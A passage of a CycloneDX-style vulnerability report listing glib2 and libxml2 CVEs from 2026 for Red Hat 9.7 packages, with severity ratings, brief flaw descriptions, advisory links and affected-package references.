"urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-0988", "ratings": [ { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 190 ], "description": "A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS).", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-0988" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7461" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-0988" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429886" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3851" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0988" }, { "url": "https://ubuntu.com/security/notices/USN-7971-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-0988" } ], "published": "2026-01-21T12:15:55+00:00", "updated": "2026-04-24T21:16:17+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.68.4-18.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-0989", "ratings": [ { "source": { "name": "amazon" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 674 ], "description": "A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-0989" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7519" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-0989" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429933" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/998" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/374" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0989" }, { "url": "https://ubuntu.com/security/notices/USN-7974-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-0989" } ], "published": "2026-01-15T15:15:52+00:00", "updated": "2026-04-22T10:16:49+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.9.13-14.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-0990", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 674 ], "description": "A flaw was found in libxml2, an XML parsing library. This uncontrolled recursion vulnerability occurs in the xmlCatalogXMLResolveURI function when an XML catalog contains a delegate URI entry that references itself. A remote attacker could exploit this configuration-dependent issue by providing a specially crafted XML catalog, leading to infinite recursion and call stack exhaustion. This ultimately results in a segmentation fault, causing a Denial of Service (DoS) by crashing affected applications.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-0990" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7519" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-0990" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429959" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1018" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0990" }, { "url": "https://ubuntu.com/security/notices/USN-7974-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-0990" } ], "published": "2026-01-15T15:15:52+00:00", "updated": "2026-04-22T10:16:50+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.9.13-14.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-0992", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 2.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 400 ], "description": "A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-0992" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7519" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-0992" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429975" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1019" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0992" }, { "url": "https://ubuntu.com/security/notices/USN-7974-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-0992" } ], "published": "2026-01-15T15:15:52+00:00", "updated": "2026-04-22T10:16:50+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.9.13-14.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-1484", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4.2, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 787 ], "description": "A flaw was found in the GLib Base64 encoding routine when processing very large input data. Due to incorrect use of integer types during length calculation, the library may miscalculate buffer boundaries. This can cause memory writes outside the allocated buffer. Applications that process untrusted or extremely large Base64 input using GLib may crash or behave unpredictably.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-1484" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-1484" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433259" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3870" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1484" }, { "url": "https://ubuntu.com/security/notices/USN-8017-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-1484" } ], "published": "2026-01-27T14:15:56+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.68.4-18.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-1485", "ratings": [ { "source": { "name": "photon" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 2.8, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 124 ], "description": "A flaw was found in Glib's content type parsing logic. This buffer underflow vulnerability occurs because the length of a header line is stored in a signed integer, which can lead to integer wraparound for very large inputs. This results in pointer underflow and out-of-bounds memory access. Exploitation requires a local user to install or process a specially crafted treemagic file, which can lead to local denial of service or application instability.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-1485" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-1485" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433325" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3871" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1485" }, { "url": "https://ubuntu.com/security/notices/USN-8017-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-1485" } ], "published": "2026-01-27T14:15:56+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.68.4-18.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-1489", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.4, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 787 ], "description": "A flaw was found in GLib. An integer overflow vulnerability in its Unicode case conversion implementation can lead to memory corruption. By processing specially crafted and extremely large Unicode strings, an attacker could trigger an undersized memory allocation, resulting in out-of-bounds writes. This could cause applications utilizing GLib for string conversion to crash or become unstable.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-1489" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-1489" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433348" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3872" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1489" }, { "url": "https://ubuntu.com/security/notices/USN-8017-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-1489" } ], "published": "2026-01-27T15:15:57+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.68.4-18.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": 